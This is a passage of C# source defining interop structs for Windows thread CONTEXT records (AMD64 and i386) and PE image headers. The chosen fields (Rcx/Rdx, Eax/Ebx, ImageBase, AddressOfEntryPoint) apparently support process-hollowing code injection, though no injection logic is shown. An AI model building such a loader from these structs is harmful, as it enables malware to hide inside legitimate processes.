226 | [StructLayout(LayoutKind.Explicit, Size = 0x4d0)]
227 | public struct _CONTEXT_AMD64
228 | {
229 | [FieldOffset(0x30)]
230 | public uint ContextFlags;
231 |
232 | [FieldOffset(0x80)]
233 | public ulong Rcx;
234 |
235 | [FieldOffset(0x88)]
236 | public ulong Rdx;
237 | }
238 |
239 | #endregion
240 |
241 | #region "i386"
242 | [StructLayout(LayoutKind.Explicit, Size = 0xf8)]
243 | public struct _IMAGE_NT_HEADERS
244 | {
245 | [FieldOffset(0x00)]
246 | public uint Signature;
247 |
248 | [FieldOffset(0x04)]
249 | public _IMAGE_FILE_HEADER FileHeader;
250 |
251 | [FieldOffset(0x18)]
252 | public _IMAGE_OPTIONAL_HEADER OptionalHeader;
253 | }
254 |
255 | [StructLayout(LayoutKind.Explicit, Size = 0xe0)]
256 | public struct _IMAGE_OPTIONAL_HEADER
257 | {
258 | [FieldOffset(0x00)]
259 | public ushort Magic;
260 |
261 | [FieldOffset(0x010)]
262 | public uint AddressOfEntryPoint;
263 |
264 | [FieldOffset(0x1c)]
265 | public uint ImageBase;
266 |
267 | [FieldOffset(0x38)]
268 | public uint SizeOfImage;
269 |
270 | [FieldOffset(0x3c)]
271 | public uint SizeOfHeaders;
272 | }
273 |
274 | [StructLayout(LayoutKind.Explicit, Size = 0x2cc)]
275 | public struct _CONTEXT
276 | {
277 | [FieldOffset(0x00)]
278 | public uint ContextFlags;
279 |
280 | [FieldOffset(0xa4)]
281 | public uint Ebx;
282 |
283 | [FieldOffset(0xb0)]
284 | public uint Eax;
285 | }
286 | #endregion
287 | }
288 |
--------------------------------------------------------------------------------